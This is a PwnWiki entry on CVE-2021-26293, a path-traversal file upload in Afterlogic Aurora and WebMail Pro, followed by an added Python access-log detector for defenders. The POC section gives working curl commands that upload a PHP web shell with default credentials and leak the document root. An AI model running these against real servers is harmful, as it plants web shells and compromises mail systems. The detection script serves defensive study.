CVE-2021-26293 Afterlogic Aurora & WebMail Pro File Upload Vulnerability

From PwnWiki

Affected versions

WebMail Pro ≤ 7.7.9
Afterlogic Aurora ≤ 7.7.9

POC

curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"

The default path is /var/www/html, but the configuration may have been changed to another path; you can try other methods to obtain it.

curl -X DELETE -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/GIVE_ME_ERROR_TO_GET_DOC_ROOT_2021"
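
For defenders, the two requests above leave a recognisable trace in the web server access log. The following is an added example, not part of the original page or of Afterlogic's code: it flags requests under /dav/server.php/ whose path contains ".." segments after repeated percent-decoding, and write methods issued by the caldav_public_user account. It assumes Apache/nginx combined log format with the authenticated user logged, and that this account should not be writing files; the log lines are constructed.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip ident user [time] "METHOD path proto" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
DAV_PREFIX = "/dav/server.php/"
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL"}
PUBLIC_USER = "caldav_public_user@localhost"  # account named on this page


def fully_decode(path, max_rounds=5):
    """Percent-decode repeatedly so double-encoded dots (%252e) are also seen."""
    for _ in range(max_rounds):
        if (decoded := unquote(path)) == path:
            break
        path = decoded
    return path


def has_traversal(path):
    """True if any segment is '..' after decoding and backslash normalisation."""
    return ".." in fully_decode(path).replace("\\", "/").split("/")


def classify(line):
    """Return the findings for one access-log line (empty list if benign)."""
    m = LOG_RE.match(line)
    if not m or not m["path"].lower().startswith(DAV_PREFIX):
        return []
    findings = []
    if has_traversal(m["path"]):
        findings.append("dav-path-traversal")
    if m["method"] in WRITE_METHODS and m["user"] == PUBLIC_USER:
        findings.append("public-user-write")
    return findings


# Constructed sample log lines (documentation IP ranges, shortened paths).
SAMPLE = [
    '203.0.113.7 - caldav_public_user@localhost [22/May/2021:10:48:00 +0000] "PUT /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e/data/x.php HTTP/1.1" 201 0',
    '198.51.100.4 - alice@example.org [22/May/2021:10:49:10 +0000] "PUT /dav/server.php/files/personal/report.pdf HTTP/1.1" 201 0',
    '203.0.113.7 - caldav_public_user@localhost [22/May/2021:10:50:30 +0000] "DELETE /dav/server.php/files/personal/old.txt HTTP/1.1" 404 120',
]

if __name__ == "__main__":
    print([classify(line) for line in SAMPLE])
```

The same two conditions can be turned into a WAF or reverse-proxy rule; installations at or below the versions listed above should be upgraded regardless of what the logs show.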